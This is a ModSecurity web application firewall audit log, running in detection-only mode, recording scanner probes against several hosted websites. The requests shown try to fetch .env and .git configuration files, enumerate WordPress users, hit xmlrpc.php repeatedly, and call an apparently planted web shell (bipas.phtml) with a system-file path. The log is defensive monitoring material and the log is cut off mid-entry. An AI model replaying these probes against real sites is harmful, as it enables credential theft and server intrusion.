Apache Engine-Mode: "DETECTION_ONLY" --e7ae301f-Z-- --3b036762-A-- [15/Jun/2025:11:13:23.278998 +0530] aE5devY8XwHnhwwa9VWeAAAAAAk 185.177.72.104 38480 127.0.0.1 7081 --3b036762-B-- GET /.env.example HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.104 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3b036762-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --3b036762-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env.example"] [unique_id "aE5devY8XwHnhwwa9VWeAAAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966202297752 981306 (- - -) Stopwatch2: 1749966202297752 981306; combined=1664, p1=369, p2=1205, p3=0, p4=0, p5=89, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3b036762-Z-- --6b4b4770-A-- [15/Jun/2025:11:13:24.648979 +0530] aE5de_zELXyWJtk-RXdDDQAAAAQ 185.177.72.104 38526 127.0.0.1 7081 --6b4b4770-B-- GET /.env.local HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.104 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6b4b4770-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --6b4b4770-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env.local"] [unique_id "aE5de_zELXyWJtk-RXdDDQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966203639694 1009342 (- - -) Stopwatch2: 1749966203639694 1009342; combined=1676, p1=389, p2=1193, p3=0, p4=0, p5=93, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6b4b4770-Z-- --19b9f725-A-- [15/Jun/2025:11:13:25.990055 +0530] aE5dfJX6T5jLdIl-tq4rwgAAAAM 185.177.72.104 38584 127.0.0.1 7081 --19b9f725-B-- GET /.env.old HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.104 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --19b9f725-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --19b9f725-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env.old"] [unique_id "aE5dfJX6T5jLdIl-tq4rwgAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.dealsdray.com"] [uri "/.env.old"] [unique_id "aE5dfJX6T5jLdIl-tq4rwgAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966204973773 1016362 (- - -) Stopwatch2: 1749966204973773 1016362; combined=1703, p1=362, p2=1182, p3=0, p4=0, p5=158, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --19b9f725-Z-- --c7e7d979-A-- [15/Jun/2025:11:13:27.281336 +0530] aE5dfi7IKUqG672kqSywrwAAAAg 185.177.72.104 38622 127.0.0.1 7081 --c7e7d979-B-- GET /.env.prod HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.104 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c7e7d979-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --c7e7d979-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env.prod"] [unique_id "aE5dfi7IKUqG672kqSywrwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966206317656 963735 (- - -) Stopwatch2: 1749966206317656 963735; combined=2170, p1=381, p2=1700, p3=0, p4=0, p5=88, sr=103, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c7e7d979-Z-- --44438d61-A-- [15/Jun/2025:11:13:28.602969 +0530] aE5dfxBbAfjIOuFq7fokTwAAAAw 185.177.72.104 38668 127.0.0.1 7081 --44438d61-B-- GET /.env.production.local HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.104 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --44438d61-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --44438d61-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env.production.local"] [unique_id "aE5dfxBbAfjIOuFq7fokTwAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966207603971 999077 (- - -) Stopwatch2: 1749966207603971 999077; combined=1679, p1=404, p2=1152, p3=0, p4=0, p5=123, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --44438d61-Z-- --dd13082e-A-- [15/Jun/2025:11:13:29.940016 +0530] aE5dgPzELXyWJtk-RXdDDwAAAAQ 185.177.72.104 38710 127.0.0.1 7081 --dd13082e-B-- GET /.env.stage HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.104 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --dd13082e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --dd13082e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env.stage"] [unique_id "aE5dgPzELXyWJtk-RXdDDwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966208978508 961573 (- - -) Stopwatch2: 1749966208978508 961573; combined=2038, p1=374, p2=1576, p3=0, p4=0, p5=87, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dd13082e-Z-- --f6e72c46-A-- [15/Jun/2025:11:13:31.228548 +0530] aE5dgoVMjG_Zv7b9NpIH5wAAAAA 185.177.72.104 34954 127.0.0.1 7081 --f6e72c46-B-- GET /admin/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.104 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f6e72c46-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --f6e72c46-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/admin/.env"] [unique_id "aE5dgoVMjG_Zv7b9NpIH5wAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966210262652 965970 (- - -) Stopwatch2: 1749966210262652 965970; combined=1825, p1=365, p2=1351, p3=0, p4=0, p5=108, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f6e72c46-Z-- --7363cf11-A-- [15/Jun/2025:11:13:32.527939 +0530] aE5dg_zELXyWJtk-RXdDEAAAAAQ 185.177.72.104 35004 127.0.0.1 7081 --7363cf11-B-- GET /api/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.104 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7363cf11-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --7363cf11-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/api/.env"] [unique_id "aE5dg_zELXyWJtk-RXdDEAAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966211570037 957969 (- - -) Stopwatch2: 1749966211570037 957969; combined=1714, p1=379, p2=1239, p3=0, p4=0, p5=96, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7363cf11-Z-- --b4b63600-A-- [15/Jun/2025:11:13:33.798969 +0530] aE5dhA2pbpddt_O7FYy28gAAAAc 185.177.72.104 35106 127.0.0.1 7081 --b4b63600-B-- GET /apps/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.104 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b4b63600-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --b4b63600-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/apps/.env"] [unique_id "aE5dhA2pbpddt_O7FYy28gAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966212850038 948986 (- - -) Stopwatch2: 1749966212850038 948986; combined=1856, p1=360, p2=1405, p3=0, p4=0, p5=90, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b4b63600-Z-- --54c0464b-A-- [15/Jun/2025:11:13:35.103402 +0530] aE5dhvY8XwHnhwwa9VWeAwAAAAk 185.177.72.104 35166 127.0.0.1 7081 --54c0464b-B-- GET /.git/config</pre> HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.104 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --54c0464b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --54c0464b-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.git/config</pre>"] [unique_id "aE5dhvY8XwHnhwwa9VWeAwAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966214123167 980291 (- - -) Stopwatch2: 1749966214123167 980291; combined=2639, p1=360, p2=2190, p3=0, p4=0, p5=88, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --54c0464b-Z-- --2e783c4f-A-- [15/Jun/2025:11:16:51.600332 +0530] aE5eS_Y8XwHnhwwa9VWeVgAAAAk 34.225.243.131 46340 127.0.0.1 7081 --2e783c4f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/default/grub.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.225.243.131 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --2e783c4f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3224 Connection: close Content-Type: text/html; charset=UTF-8 --2e783c4f-H-- Message: Warning. Matched phrase "etc/default/grub" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/default/grub found within ARGS:path: /etc/default/grub.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/default/grub" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/default/grub found within ARGS:path: /etc/default/grub.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5eS_Y8XwHnhwwa9VWeVgAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1749966411596173 4213 (- - -) Stopwatch2: 1749966411596173 4213; combined=2046, p1=363, p2=1564, p3=30, p4=35, p5=54, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2e783c4f-Z-- --4e798321-A-- [15/Jun/2025:11:22:11.714168 +0530] aE5fi4VMjG_Zv7b9NpIIowAAAAA 13.201.31.180 39840 127.0.0.1 7081 --4e798321-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.rsda.in X-Real-IP: 13.201.31.180 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 --4e798321-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 X-Robots-Tag: noindex Link: <https://www.rsda.in/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --4e798321-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.rsda.in"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5fi4VMjG_Zv7b9NpIIowAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966731408794 305464 (- - -) Stopwatch2: 1749966731408794 305464; combined=1652, p1=330, p2=1212, p3=0, p4=0, p5=109, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4e798321-Z-- --3b5e0656-A-- [15/Jun/2025:11:22:14.911876 +0530] aE5fjhmnVjDRYaxdCWSu_gAAAAY 13.201.31.180 40216 127.0.0.1 7081 --3b5e0656-B-- POST //xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 13.201.31.180 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 483 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Content-Type: application/xml --3b5e0656-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --3b5e0656-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 13.201.31.180 (+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 13.201.31.180 (+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE5fjhmnVjDRYaxdCWSu_gAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966734623255 288677 (- - -) Stopwatch2: 1749966734623255 288677; combined=2267, p1=349, p2=1504, p3=58, p4=60, p5=181, sr=91, sw=115, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3b5e0656-Z-- --a33f0041-A-- [15/Jun/2025:11:23:14.377882 +0530] aE5fyj8QAuiw8zL7QHNoygAAAAU 13.201.31.180 43166 127.0.0.1 7081 --a33f0041-B-- POST //xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 13.201.31.180 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Content-Type: application/xml --a33f0041-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a33f0041-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 13.201.31.180 (110+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 13.201.31.180 (110+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE5fyj8QAuiw8zL7QHNoygAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749966794091243 286707 (- - -) Stopwatch2: 1749966794091243 286707; combined=2104, p1=364, p2=1285, p3=59, p4=62, p5=203, sr=98, sw=131, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a33f0041-Z-- --07da9734-A-- [15/Jun/2025:11:24:17.212115 +0530] aE5gCPzELXyWJtk-RXdEIAAAAAQ 13.201.31.180 37156 127.0.0.1 7081 --07da9734-B-- POST //xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 13.201.31.180 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 487 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Content-Type: application/xml --07da9734-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --07da9734-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified 